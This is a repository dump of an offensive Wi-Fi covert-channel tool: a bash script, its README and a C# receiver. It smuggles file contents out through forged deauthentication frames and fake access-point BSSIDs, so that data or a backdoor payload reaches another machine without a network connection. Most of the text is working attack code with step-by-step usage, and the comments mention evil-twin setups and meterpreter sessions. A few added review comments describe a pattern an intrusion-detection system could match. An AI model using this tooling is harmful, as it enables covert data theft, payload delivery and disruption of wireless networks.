557 | aireplay-ng -0 1 -a "$3" -c $tempaddress "$4" & 558 | sleep 0.2 559 | elif [ "$6" == "faster" ] ; 560 | then 561 | echo "$(tput setaf 2)[!]:Sending [$(tput setaf 11)"$text"$(tput setaf 2)] via DeAuth.Cli.BSSID.[$(tput setaf 3)$tempaddress$(tput setaf 2)]" "to Target AP.[$(tput setaf 3)"$3"$(tput setaf 2)]$(tput setaf 10) Done." 562 | aireplay-ng -0 1 -a "$3" -c $tempaddress "$4" & 563 | 564 | #if [ "$id" == "f" ]; 565 | #then 566 | #sleep 1.5 567 | #fi 568 | else 569 | Time=`date '+%d/%m/%Y %H:%M:%S'` 570 | echo "$(tput setaf 2)[!]:[$Time] Sending [$(tput setaf 11)"$text"$(tput setaf 2)] via DeAuth.Cli.BSSID.[$(tput setaf 3)$tempaddress$(tput setaf 2)]" "to Target AP.[$(tput setaf 3)"$3"$(tput setaf 2)]$(tput setaf 10) Done." 571 | sleep 0.2 572 | out=`aireplay-ng -0 1 -a "$3" -c $tempaddress "$4" | grep "Sending"` 573 | if [ "$6" == "dbg" ] ; 574 | then 575 | echo "$(tput setaf 14)$out" 576 | fi 577 | fi 578 | 579 | done 580 | 581 | tput setaf 6; 582 | Time=`date '+%d/%m/%Y %H:%M:%S'` 583 | echo "[>]:[$Time] Sending Finish Flag [00:ff:00:ff:00:ff] to AccessPoint: $3" 584 | aireplay-ng -0 1 -a "$3" -c "00:ff:00:ff:00:ff" "$4" | grep "error ;)" 585 | Time=`date '+%d/%m/%Y %H:%M:%S'` 586 | echo "[>]:[$Time] Exfiltration via Deauthentication Packets Done." 
587 | fi 588 | ############################### ExfilDeauth v2 (Command-based send) ############################### 589 | 590 | ############################### ExfilDeauth v2 (Command-based receive) ############################### 591 | # ExfilDeauthDumps_CmdBased "fakev2" wlan1mon channel BSSID-optional 592 | function ExfilDeauthDumps_CmdBased 593 | { 594 | nohup killall airbase-ng > "kill.txt" 2>&1 & 595 | nohup killall tcpdump > "kill.txt" 2>&1 & 596 | tput setaf 2; 597 | FakeAp="$1"; 598 | defaultBSSID="$4" 599 | if [[ "$1" == "" || "$1" == " " ]] 600 | then 601 | FakeAp="DefaultFakeAP"; 602 | fi 603 | if [ "$4" == "" ] 604 | then 605 | defaultBSSID="00:11:22:33:44:55" 606 | fi 607 | 608 | Time=`date '+%d/%m/%Y %H:%M:%S'` 609 | echo "$(tput setaf 2)[>]:[$Time]:Default AP.BSSID.[$(tput setaf 3)$defaultBSSID$(tput setaf 2)]:$(tput setaf 10)Created$(tput setaf 2)" 610 | nohup airbase-ng -a "$defaultBSSID" --essid "$FakeAp" -I 10 -0 "$2" -c "$3" > "airbase_output.txt" 2>&1 & 611 | Time=`date '+%d/%m/%Y %H:%M:%S'` 612 | echo "$(tput setaf 2)[>]:[$Time]:Default AP.ESSID.[$(tput setaf 3)$FakeAp$(tput setaf 2)] with Wifi Channel.[$(tput setaf 3)$3$(tput setaf 2)] via Interface.[$(tput setaf 3)$2$(tput setaf 2)]:$(tput setaf 10)Started$(tput setaf 2)" 613 | tput setaf 10; 614 | sleep 1.5 615 | out=`nohup tcpdump -i "$2" -n | grep "DeAuthentication" > "DeauthPayloadDumps.txt" &` 616 | sleep 1 617 | counter=0 618 | while true 619 | do 620 | Time=`date '+%d/%m/%Y %H:%M:%S'` 621 | echo "$(tput setaf 2)[>]:[$Time]:$(tput setaf 3)$2$(tput setaf 2) Packet Monitoring for DeAuthentication Traffic:$(tput setaf 10)Started$(tput setaf 2)" 622 | printf "[>]:[$Time]:$(tput setaf 3)$2$(tput setaf 2) Packet Monitoring " 623 | while true 624 | do 625 | tput setaf 3; 626 | if (( $counter > 3 )) 627 | then 628 | printf '.' 
629 | counter=0 630 | fi 631 | tput setaf 2; 632 | FinishFlag=`strings "DeauthPayloadDumps.txt" | grep "00:ff:00:ff:00:ff"` 633 | if (( `echo ${#FinishFlag}` !=0 )) 634 | then 635 | tput setaf 10; 636 | Time=`date '+%d/%m/%Y %H:%M:%S'` 637 | echo "" 638 | echo "$(tput setaf 2)[!]:[$Time]:Finish Flag:$(tput setaf 10)Detected$(tput setaf 2)" 639 | break; 640 | fi 641 | ((counter++)) 642 | sleep 3.5 643 | done 644 | # `strings "DeauthPayloadDumps.txt" | awk {'print $12'} | awk '!a[$0]++' | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g' | sed 's/00:11:22:33:44:55//g' | sed 's/00://g' | sed 's/01://g' | sed 's/02://g' | sed 's/03://g' | sed 's/04://g' | sed 's/05://g' | sed 's/06://g' | sed 's/07://g' | sed 's/08://g' | sed 's/09://g' | sed 's/0a://g' | sed 's/0b://g' | sed 's/0c://g' | sed 's/0d://g' | sed 's/0e://g' | sed 's/0f://g' > "DeAuthbytes1.txt" ` 645 | `strings "DeauthPayloadDumps.txt" | awk {'print $12'} | awk '!a[$0]++' | sed "s/$defaultBSSID//g" | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g' | sed 's/00:11:22:33:44:55//g' | sed 's/00://g' | sed 's/01://g' | sed 's/02://g' | sed 's/03://g' | sed 's/04://g' | sed 's/05://g' | sed 's/06://g' | sed 's/07://g' | sed 's/08://g' | sed 's/09://g' | sed 's/0a://g' | sed 's/0b://g' | sed 's/0c://g' | sed 's/0d://g' | sed 's/0e://g' | sed 's/0f://g' | xxd -r -p > "DeAuthbytes.txt" ` 646 | payload=`cat DeAuthbytes.txt` 647 | Time=`date '+%d/%m/%Y %H:%M:%S'` 648 | echo "$(tput setaf 2)[!]:[$Time]:Payload Dumping:$(tput setaf 10)Done$(tput setaf 2)." 
649 | echo "$(tput setaf 2)[!]:[$Time]:Text/Data Dumped:$(tput setaf 11) $payload$(tput setaf 2)" 650 | nohup killall tcpdump > "kill.txt" 2>&1 & 651 | Timestr=`date '+%d-%m-%Y.%H-%M-%S'` 652 | echo " " > "ExfilOutput_$Timestr.txt" 653 | echo $payload > "ExfilOutput_$Timestr.txt" 654 | echo "$(tput setaf 2)[>]:[$Time]:Text/Data Saved to $(tput setaf 10)\"ExfilOutput_$Timestr.txt\"$(tput setaf 2)" 655 | tput setaf 2; 656 | sleep 0.5; 657 | echo "" > "DeauthPayloadDumps.txt" 658 | sleep 0.5; 659 | tput setaf 10; 660 | `nohup tcpdump -i "$2" -n | grep "DeAuthentication" > "DeauthPayloadDumps.txt" 2>&1 & ` 661 | done 662 | } 663 | ############################### ExfilDeauth v2 (Command-based receive) ############################### 664 | 665 | if [ $1 == "-deauthdumps" ] 666 | then 667 | # ExfilDeauthDumps_CmdBased "fakev2" wlan1mon channel 668 | ExfilDeauthDumps_CmdBased "$2" "$3" "$4" "$5" 669 | fi 670 | 671 | if [ $1 == "help" ] 672 | then 673 | tput setaf 2; 674 | echo "$(tput setaf 10)--------------------------------------------------------" 675 | echo "$(tput setaf 2)NativePayload_BSSID.sh$(tput setaf 11) v1 $(tput setaf 2)Syntax: " 676 | echo 677 | echo "$(tput setaf 3)Step1 (Client Side):" 678 | echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -f $(tput setaf 14)[text-file] $(tput setaf 6)[Fake-AP-Name] $(tput setaf 11)[MonitorMode-Interface]" 679 | echo "$(tput setaf 2)Example [System A]:$(tput setaf 10)./NativePayload_BSSID.sh -f $(tput setaf 14)mytext.txt $(tput setaf 6)myfakeAP $(tput setaf 11)Wlan3mon" 680 | echo 681 | echo "$(tput setaf 3)Step2 (Server Side):" 682 | echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -s $(tput setaf 14)[Wifi-Interface] $(tput setaf 6)[Exfil-Dump-file]" 683 | echo "$(tput setaf 2)Example [System B]:$(tput setaf 10)./NativePayload_BSSID.sh -s $(tput setaf 14)wlan0 $(tput setaf 6)ExfilDumped.txt" 684 | echo 685 | echo "$(tput setaf 3)Description:$(tput setaf 2) with Step1 (system A) you 
will inject bytes for (mytext.txt) file to BSSID for Fake AP in this case (myfakeAP) , with Step2 on (system B) you can have this text file via Scanning Fake AP on AIR by Wireless traffic (Using iwlist tool)" 686 | echo "Note : before step1 you should make Monitor-Mode Interface (WlanXmon) by this command for example : $(tput setaf 10)airmon-ng start wlan3 " 687 | echo "$(tput setaf 10)--------------------------------------------------------" 688 | echo "$(tput setaf 2)NativePayload_BSSID.sh$(tput setaf 11) v2 $(tput setaf 2)Syntax I: " 689 | echo 690 | echo "$(tput setaf 3)Step1 (Server Side):" 691 | echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -deauthdumps $(tput setaf 14)[FakeAP-ESSID] $(tput setaf 6)[MonitorMode-Interface]$(tput setaf 11) [Wifi-Channel] $(tput setaf 3)[FakeAP-BSSID]" 692 | echo "$(tput setaf 2)Example [System B]:$(tput setaf 10)./NativePayload_BSSID.sh -deauthdumps $(tput setaf 14)MyFakeAP $(tput setaf 6)wlan1mon$(tput setaf 11) 7 $(tput setaf 3)00:12:32:44:64:19" 693 | echo 694 | echo "$(tput setaf 3)Step2 (Client Side):" 695 | echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -exfildeauth $(tput setaf 14)[text-file] $(tput setaf 6)[Target-FakeAP-BSSID] $(tput setaf 11)[Wifi-Interface] $(tput setaf 3)[Wifi-Channel] $(tput setaf 4)[dbg]/[fast]/[faster]" 696 | echo "$(tput setaf 2)Example [System A]:$(tput setaf 10)./NativePayload_BSSID.sh -exfildeauth $(tput setaf 14)mypayload.txt $(tput setaf 6)00:12:32:44:64:19 $(tput setaf 11)wlan2 $(tput setaf 3)7 $(tput setaf 4)faster" 697 | echo 698 | echo "$(tput setaf 3)Description:$(tput setaf 2) with Step1 (system B) you will have Fake AP via wlanXmon interface also DeAuth Packets will Dump via Tcpdump tool in this step in server side , Note: before step1 you should make WlanXmon Monitor-Mode Interface by this command : $(tput setaf 10)airmon-ng start wlanX " 699 | echo "$(tput setaf 2)with Step2 your Client (system A) will send that text file to 
(Target/system B) via DeAuth Packets On AIR Directly..." 700 | echo "Note: $(tput setaf 10)via Step2 your Payload Injected to Client.BSSIDs in DeAuth Packets." 701 | echo "$(tput setaf 10)--------------------------------------------------------" 702 | echo "$(tput setaf 2)NativePayload_BSSID.sh$(tput setaf 11) v2 $(tput setaf 2)Syntax II: " 703 | echo "$(tput setaf 3)(Server/Client Side):" 704 | echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -exfilserver" 705 | echo "$(tput setaf 3)Description:$(tput setaf 2) for more information please read PDF/Article on Github..." 706 | echo "$(tput setaf 10)--------------------------------------------------------" 707 | 708 | fi 709 | 710 | # myrecords="" 711 | # ChatInputArray=() 712 | # base64isonoff="false" 713 | # isb64="false" 714 | # iscmdshellonoff="off" 715 | isdebug="off" 716 | ExfilMode="bssid" 717 | server_client_Mode="server" 718 | 719 | if [ $1 == "-exfilserver" ]; 720 | then 721 | 722 | while [ "$input" != "exit" ] 723 | do 724 | while true ; 725 | do 726 | 727 | if [ $ExfilMode == "bssid" ] ; 728 | then 729 | 730 | if [ "$server_client_Mode" == "client" ] 731 | then 732 | read -p "$(tput setaf 2)[>]:WIFI::Chat:input:[$(tput setaf 3)Client$(tput setaf 2)][$(tput setaf 3)BSSID$(tput setaf 2)]#$(tput setaf 11) " input 733 | else 734 | read -p "$(tput setaf 2)[>]:WIFI::Chat:input:[$(tput setaf 3)Server$(tput setaf 2)][$(tput setaf 3)BSSID$(tput setaf 2)]#$(tput setaf 11) " input 735 | fi 736 | else 737 | 738 | if [ "$server_client_Mode" == "client" ] 739 | then 740 | read -p "$(tput setaf 2)[>]:WIFI::Chat:input:[$(tput setaf 3)Client$(tput setaf 2)][$(tput setaf 3)DeAuth$(tput setaf 2)]#$(tput setaf 11) " input 741 | else 742 | read -p "$(tput setaf 2)[>]:WIFI::Chat:input:[$(tput setaf 3)Server$(tput setaf 2)][$(tput setaf 3)DeAuth$(tput setaf 2)]#$(tput setaf 11) " input 743 | fi 744 | fi 745 | tput setaf 2 746 | if [[ $input == "@exit" ]] 747 | then 748 | exit ; 749 | elif [[ "$input" == 
"@clear" ]] ; 750 | then 751 | clear ; 752 | elif [[ "$input" == "@help" ]] ; 753 | then 754 | _help "$server_client_Mode" ; 755 | elif [[ "$input" == "@clientmode" || "$input" == "@cli" ]] ; 756 | then 757 | tput setaf 10 758 | echo "[@]:ChatMode::Client.Mode:On" 759 | tput setaf 2 760 | server_client_Mode="client" 761 | elif [[ "$input" == "@servermode" || "$input" == "@serv" ]] ; 762 | then 763 | tput setaf 10 764 | echo "[@]:ChatMode::Server.Mode:On" 765 | nohup killall airbase-ng > "killairbase.txt" 2>&1 & 766 | tput setaf 2 767 | server_client_Mode="server" 768 | elif [[ "$input" == "@run" ]] ; 769 | then 770 | if [ "$server_client_Mode" == "server" ] 771 | then 772 | tput setaf 10 773 | if [ "$ExfilMode" == "bssid" ] 774 | then 775 | echo "[@]:ChatMode::ServerSide.[Bssid].Scanning.AccessPoints:Started" 776 | break; 777 | else 778 | echo "[@]:ChatMode::ServerSide.[DeAuth].Scanning.Mode:Started" 779 | break; 780 | fi 781 | else 782 | tput setaf 10 783 | echo "[@]:this command supported in [ServerSide] only" 784 | fi 785 | tput setaf 2 786 | elif [[ "$input" == "@dbgon" ]] ; 787 | then 788 | tput setaf 10 789 | echo "[@]:ChatMode::Debug.ShowDetails:On" 790 | tput setaf 2 791 | isdebug="on" 792 | elif [[ "$input" == "@dbgoff" ]] ; 793 | then 794 | tput setaf 10 795 | echo "[@]:ChatMode::Debug.ShowDetails:Off" 796 | tput setaf 2 797 | isdebug="off" 798 | elif [[ "$input" == "@bssid" || "$input" == "bssid" ]] ; 799 | then 800 | tput setaf 10 801 | ExfilMode="bssid" 802 | echo "[@]:ChatMode::SendbyBSSID:On" 803 | tput setaf 2 804 | elif [[ "$input" == "@deauth" ]] ; 805 | then 806 | tput setaf 10 807 | ExfilMode="deauth" 808 | echo "[@]:ChatMode::SendbyDeAuth:On" 809 | tput setaf 2 810 | elif [[ $input != '' && $input != "@"* && "$server_client_Mode" == "client" ]] ; 811 | then 812 | break; 813 | elif [[ $input != '' && $input == "@run" && "$server_client_Mode" == "server" ]] ; 814 | then 815 | break; 816 | else 817 | Again="Again;)" 818 | fi 819 | done 820 | 821 | 
if [ "$ExfilMode" == "bssid" ] 822 | then 823 | if [ "$server_client_Mode" == "client" ] 824 | then 825 | if [ "$isdebug" == "off" ] 826 | then 827 | 828 | nohup killall airbase-ng > "kill.txt" 2>&1 & 829 | while true ; 830 | do 831 | read -p "$(tput setaf 2)[>]:WIFI::Monitor.Mode.[Interface]:input:[$(tput setaf 3)wlan0mon$(tput setaf 2)]#$(tput setaf 11) " input2 832 | if [ "$input2" != '' ] 833 | then 834 | break 835 | fi 836 | done 837 | sendBssids "$input" "fake" "$input2" "false" 838 | else 839 | nohup killall airbase-ng > "kill.txt" 2>&1 & 840 | while true ; 841 | do 842 | read -p "$(tput setaf 2)[>]:WIFI::Monitor.Mode.[Interface]:input:[$(tput setaf 3)wlan0mon$(tput setaf 2)]#$(tput setaf 11) " input2 843 | if [ "$input2" != '' ] 844 | then 845 | break 846 | fi 847 | done 848 | sendBssids "$input" "fake" "$input2" "true" 849 | fi 850 | else 851 | if [ "$isdebug" == "off" ] 852 | then 853 | while true ; 854 | do 855 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Interface]:input:[$(tput setaf 3)wlan0$(tput setaf 2)]#$(tput setaf 11) " input2 856 | if [ "$input2" != '' ] 857 | then 858 | break 859 | fi 860 | done 861 | receiveBssids "$input2" "myExfildump.txt" "false" 862 | else 863 | while true ; 864 | do 865 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Interface]:input:[$(tput setaf 3)wlan0$(tput setaf 2)]#$(tput setaf 11) " input2 866 | if [ "$input2" != '' ] 867 | then 868 | break 869 | fi 870 | done 871 | receiveBssids "$input2" "myExfildump.txt" "true" 872 | fi 873 | 874 | fi 875 | 876 | fi 877 | if [ "$ExfilMode" == "deauth" ] 878 | then 879 | if [ "$server_client_Mode" == "client" ] 880 | then 881 | if [ "$isdebug" == "off" ] 882 | then 883 | while true ; 884 | do 885 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Interface]:input:[$(tput setaf 3)wlan0$(tput setaf 2)]#$(tput setaf 11) " wlan_input2 886 | if [ "$wlan_input2" != '' ] 887 | then 888 | break 889 | fi 890 | done 891 | while true ; 892 | do 893 | read -p "$(tput setaf 
2)[>]:WIFI::Wlan.[Channel]:input:[$(tput setaf 3)1$(tput setaf 2)]#$(tput setaf 11) " channel_input3 894 | if [ "$channel_input3" != '' ] 895 | then 896 | break 897 | fi 898 | done 899 | ExfilDeauth "$input" "00:11:22:33:44:55" "$wlan_input2" "$channel_input3" "false" 900 | else 901 | while true ; 902 | do 903 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Interface]:input:[$(tput setaf 3)wlan0$(tput setaf 2)]#$(tput setaf 11) " wlan_input2 904 | if [ "$wlan_input2" != '' ] 905 | then 906 | break 907 | fi 908 | done 909 | while true ; 910 | do 911 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Channel]:input:[$(tput setaf 3)1$(tput setaf 2)]#$(tput setaf 11) " channel_input3 912 | if [ "$channel_input3" != '' ] 913 | then 914 | break 915 | fi 916 | done 917 | ExfilDeauth "$input" "00:11:22:33:44:55" "$wlan_input2" "$channel_input3" "true" 918 | fi 919 | else 920 | if [ "$isdebug" == "off" ] 921 | then 922 | while true ; 923 | do 924 | read -p "$(tput setaf 2)[>]:WIFI::WlanMon.[Interface]:input:[$(tput setaf 3)wlan1mon$(tput setaf 2)]#$(tput setaf 11) " wlanmon_input2 925 | if [ "$wlanmon_input2" != '' ] 926 | then 927 | break 928 | fi 929 | done 930 | while true ; 931 | do 932 | read -p "$(tput setaf 2)[>]:WIFI::WlanMon.[Channel]:input:[$(tput setaf 3)1$(tput setaf 2)]#$(tput setaf 11) " channelmon_input3 933 | if [ "$channelmon_input3" != '' ] 934 | then 935 | break 936 | fi 937 | done 938 | ExfilDeauthDumps "" "$wlanmon_input2" "$channelmon_input3" "false" 939 | else 940 | while true ; 941 | do 942 | read -p "$(tput setaf 2)[>]:WIFI::WlanMon.[Interface]:input:[$(tput setaf 3)wlan1mon$(tput setaf 2)]#$(tput setaf 11) " wlanmon_input2 943 | if [ "$wlanmon_input2" != '' ] 944 | then 945 | break 946 | fi 947 | done 948 | while true ; 949 | do 950 | read -p "$(tput setaf 2)[>]:WIFI::WlanMon.[Channel]:input:[$(tput setaf 3)1$(tput setaf 2)]#$(tput setaf 11) " channelmon_input3 951 | if [ "$channelmon_input3" != '' ] 952 | then 953 | break 954 | fi 955 | done 956 | 
ExfilDeauthDumps "" "$wlanmon_input2" "$channelmon_input3" "true" 957 | fi 958 | 959 | fi 960 | fi 961 | 962 | done 963 | fi 964 | ################################################## version 2 ################################################## 965 | -------------------------------------------------------------------------------- /NativePayload_BSSID v2/README.md: -------------------------------------------------------------------------------- 1 | # NativePayload_BSSID.sh v2 2 | 3 | Exfiltration via Wireless DeAuthentication Packets from Client to Server on AIR (without user-pass or Wifi Connection & very fast) 4 | 5 | Note: this code tested in kali linux systems (only). 6 | 7 | Article/Pdf and New video will Publish here soon... 8 | 9 | Video[1] , NativePayload_BSSID.sh v2 (step by step) : https://www.youtube.com/watch?v=rg-O4RKt9OA 10 | 11 | as you can see in this "Picture 1", with this switch "help" you can see Help information : ./NativePayload_BSSID.sh help 12 | 13 | ![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSIDv2/NativePayload_BSSID%20help.png) 14 | Picture 1: 15 | 16 | # NativePayload_BSSID.sh (help): 17 | 18 | NativePayload_BSSID.sh v1 Syntax: 19 | 20 | Step1 (Client Side): 21 | Syntax :./NativePayload_BSSID.sh -f [text-file] [Fake-AP-Name] [MonitorMode-Interface] 22 | Example [System A]:./NativePayload_BSSID.sh -f mytext.txt myfakeAP Wlan3mon 23 | 24 | Step2 (Server Side): 25 | Syntax :./NativePayload_BSSID.sh -s [Wifi-Interface] [Exfil-Dump-file] 26 | Example [System B]:./NativePayload_BSSID.sh -s wlan0 ExfilDumped.txt 27 | 28 | Description: with Step1 (system A) you will inject bytes for (mytext.txt) file to BSSID for Fake AP in this case (myfakeAP) , 29 | with Step2 on (system B) you can have this text file via Scanning Fake AP on AIR by Wireless traffic (Using iwlist tool) 30 | Note : before step1 you should make 
Monitor-Mode Interface (WlanXmon) by this command, for example : airmon-ng start wlan3
--------------------------------------------------------
NativePayload_BSSID.sh v2 Syntax I:

Step1 (Server Side):
Syntax :./NativePayload_BSSID.sh -deauthdumps [FakeAP-ESSID] [MonitorMode-Interface] [Wifi-Channel] [FakeAP-BSSID]
Example [System B]:./NativePayload_BSSID.sh -deauthdumps MyFakeAP wlan1mon 7 00:12:32:44:64:19

Step2 (Client Side):
Syntax :./NativePayload_BSSID.sh -exfildeauth [text-file] [Target-FakeAP-BSSID] [Wifi-Interface] [Wifi-Channel] [dbg]/[fast]/[faster]
Example [System A]:./NativePayload_BSSID.sh -exfildeauth mypayload.txt 00:12:32:44:64:19 wlan2 7 faster

Description: with Step1 (system B) you will have a Fake AP via the wlanXmon interface; DeAuth Packets will also be dumped via the Tcpdump
tool in this step on the server side.
Note: before step1 you should create the WlanXmon Monitor-Mode Interface with this command : airmon-ng start wlanX
with Step2 your Client (system A) will send that text file to (Target/system B) via DeAuth Packets On AIR Directly...
note: via Step2 your Payload is Injected into Client BSSIDs in DeAuth Packets.
--------------------------------------------------------
NativePayload_BSSID.sh v2 Syntax II:

(Server/Client Side):
Syntax :./NativePayload_BSSID.sh -exfilserver
Description: for more information please read the PDF/Article on Github... (soon)
--------------------------------------------------------

--------------------------------------------------------------------------------------

# NativePayload_BSSID.sh v2
# and DeAuth Method (step by step):

Step 1 :
with the "-deauthdumps" switch you will have a Fake AP via the wlanXmon interface; DeAuth Packets will also be dumped via the Tcpdump
tool in this step on the server side.

Note: before step1 you should create the WlanXmon Monitor-Mode Interface with this command : airmon-ng start wlanX

Step1 (Server Side):
Example [System B]:./NativePayload_BSSID.sh -deauthdumps MyFakeAP wlan1mon 7 00:12:32:44:64:19


![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSIDv2/NativePayload_BSSID%20Step1.png)
Picture 2:

Step 2 :
with Step2 your Client (system A) will send that text file to (Target/system B) via DeAuth Packets On AIR Directly...
note: via Step2 your Payload is Injected into Client BSSIDs in DeAuth Packets.

Step2 (Client Side):
Example [System A]:./NativePayload_BSSID.sh -exfildeauth mypayload.txt 00:12:32:44:64:19 wlan2 7 faster

![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSIDv2/NativePayload_BSSID%20Step2.png)
Picture 3:

as you can see in "Picture 4", after 5 seconds that text file "3.txt" has been Exfiltrated from client to server on AIR (very simple).

![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSIDv2/NativePayload_BSSID%20Step4.png)
Picture 4:

Article and Pdf File will be Published here soon...
89 | 90 | Video STEP BY STEP : https://www.youtube.com/watch?v=rg-O4RKt9OA 91 | 92 | -------------------------------------------------------------------------------- /NativePayload_BSSID.cs: --------------------------------------------------------------------------------
// NOTE(review): this listing is rendered with an "N | " gutter prefix on every line, and the page has
// stripped generic type arguments and XML tags (e.g. "List MacAddress = new List();" and the profileXml
// string below). Only comments were added here; the code tokens are exactly as the page shows them.
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using NativeWifi;
6 | using System.Runtime.InteropServices;
7 |
8 | namespace NativePayload_BSSID
9 | {
10 | class Program
11 | {
12 |
// Decodes the SSID byte buffer of a scanned network into an ASCII string, honouring SSIDLength.
13 | static string GetStringForSSID(Wlan.Dot11Ssid ssid)
14 | {
15 | return Encoding.ASCII.GetString(ssid.SSID, 0, (int)ssid.SSIDLength);
16 | }
17 |
// Process-wide state shared between __show_BSSID and Main.
18 | static string Temp_BSSID = ""; // last BSSID seen for the filtered ESSID, as hex with the leading "00" octet removed
19 | static int counter = 0; // number of entries appended to MacAddress
20 | static WlanClient client = new WlanClient();
21 | static bool init = false; // set once the "ffffffffff" start marker has been observed
22 | static bool onetime = false; // never read in this listing
23 |
// Scans every WLAN interface once and returns the BSSID (10 hex chars) of the network whose ESSID equals
// filter_bssid. Despite the parameter name, the comparison is against the ESSID (network name).
// Side effects: appends to MacAddress, increments counter, sets init, writes to the console.
24 | static string __show_BSSID(string filter_bssid)
25 | {
26 | try
27 | {
28 |
29 | foreach (WlanClient.WlanInterface wlanIface in client.Interfaces)
30 | {
31 | try
32 | {
33 |
34 | System.Threading.Thread.Sleep(1000);
// The BSS list is read BEFORE Scan() is issued below, so each call reports the results of an earlier scan.
35 | Wlan.WlanBssEntry[] BSSLIST = wlanIface.GetNetworkBssList();
36 |
37 | try
38 | {
39 | wlanIface.Scan();
40 | }
41 | catch (Exception x1)
42 | {
43 |
44 | Console.WriteLine("x1: " + x1.Message);
45 |
46 | }
47 | Temp_BSSID = "";
48 | foreach (Wlan.WlanBssEntry item in BSSLIST)
49 | {
50 | string temp_filter = GetStringForSSID(item.dot11Ssid);
51 | if (temp_filter == filter_bssid)
52 | {
53 |
54 | Console.ForegroundColor = ConsoleColor.DarkCyan;
55 | Console.Write("Detecting BSSID :");
56 | Console.ForegroundColor = ConsoleColor.Cyan;
// If more than one BSS advertises the same ESSID, their BSSIDs are concatenated into Temp_BSSID;
// the "Length > 10" branches further down are the workaround for that.
57 | foreach (var item2 in item.dot11Bssid)
58 | {
59 | Console.Write(" {0}", item2.ToString("x2"));
60 | Temp_BSSID += item2.ToString("x2");
61 | }
62 | Console.ForegroundColor = ConsoleColor.DarkCyan;
63 | Console.Write(" ESSID :");
64 | Console.Write(" " + GetStringForSSID(item.dot11Ssid));
65 |
66 | }
67 |
68 |
69 | }
70 | if (Temp_BSSID.Length > 2)
71 | {
72 | // remove 00 from first section , getting payload only since fake macaddress
73 | Temp_BSSID = Temp_BSSID.Substring(2);
74 | }
75 |
// Transfer markers carried in the BSSID: "ffffffffff" = start, "ff00ff00ff" = end (see also Main).
// A wireless IDS can key on the same observable pattern: beacons for a single ESSID whose BSSID changes
// every few seconds, always with a 00 first octet, bracketed by these two sentinel values.
76 | if (Temp_BSSID == "ffffffffff") init = true;
77 |
// NOTE(review): List.Capacity is the allocated slot count, not the element count (Count). It is 0 only
// while nothing has ever been added and can exceed Count afterwards; Main sizes _X_Bytes from it as well.
78 | if (init && MacAddress.Capacity != 0 && Temp_BSSID != MacAddress.AsEnumerable().Last().ToString() && Temp_BSSID!="ff00ff00ff" )
79 | {
80 | Console.ForegroundColor = ConsoleColor.DarkGreen;
81 | Console.Write(" Dumped ");
82 | if (Temp_BSSID != "")
83 | {
84 | /// something is wrong or error happend
85 | /// sometimes this value is higher than 10 like 20 so we should getting last 10 char for this value always
86 | /// for dumping new and Correct BSSID
87 | if (Temp_BSSID.Length > 10)
88 | {
89 | Temp_BSSID = Temp_BSSID.Substring(Temp_BSSID.Length - 10);
90 | Console.ForegroundColor = ConsoleColor.Red;
91 | Console.Write("[X] {0}", Temp_BSSID);
92 | Console.ForegroundColor = ConsoleColor.DarkYellow;
93 |
94 | }
95 |
96 | counter++;
97 | MacAddress.Add(Temp_BSSID);
98 | }
99 | }
// First-entry branch: taken while the list is still empty. Unlike the branch above it does not require
// init, so the first non-marker BSSID seen is accepted even if the start marker was never observed.
100 | else if (MacAddress.Capacity == 0)
101 | {
102 | Console.ForegroundColor = ConsoleColor.DarkYellow;
103 | Console.Write(" Dumped \n");
104 | if (Temp_BSSID != "" && Temp_BSSID != "ffffffffff")
105 | {
106 | /// something is wrong or error happend
107 | /// sometimes this value is higher than 10 like 20 so we should getting last 10 char for this value always
108 | /// for dumping new and Correct BSSID
109 | if (Temp_BSSID.Length > 10)
110 | {
111 | Temp_BSSID = Temp_BSSID.Substring(Temp_BSSID.Length - 10);
112 | Console.ForegroundColor = ConsoleColor.Red;
113 | Console.Write("[X] {0}", Temp_BSSID);
114 | Console.ForegroundColor = ConsoleColor.DarkYellow;
115 | }
116 |
117 | counter++;
118 | MacAddress.Add(Temp_BSSID);
119 | }
120 | }
121 | else if (Temp_BSSID == "ff00ff00ff")
122 | {
123 | // time to exit and run payload
124 | Console.ForegroundColor = ConsoleColor.Red;
125 | Console.WriteLine("\n Done. \n");
126 | Console.WriteLine("Running Payload ...");
// Early return: the remaining interfaces in the outer foreach are not visited on the end marker.
127 | return Temp_BSSID;
128 | }
129 |
130 | if (MacAddress.Capacity != 0)
131 | {
132 | Console.WriteLine(" ==> " + counter + " " + MacAddress.AsEnumerable().Last().ToString());
133 |
134 |
135 | }
136 |
137 | }
138 | catch (Exception ee)
139 | {
140 | Console.WriteLine("e2: "+ee.Message);
141 |
142 | }
143 |
144 | /// this code was for Connecting by WEP or WPA to AP ,
145 | /// but for Dumping Injected Payloads FROM Fake AP you need Scan Method only
146 | /// if ypu want to develop your own code like this for Connecting via Fake Access Point this code is very good ;)
147 | /// something like Evil-Twin ....
148 | /// and maybe you want get mterpreter session by WIFI traffic with Fake AP then you need this code for connecting
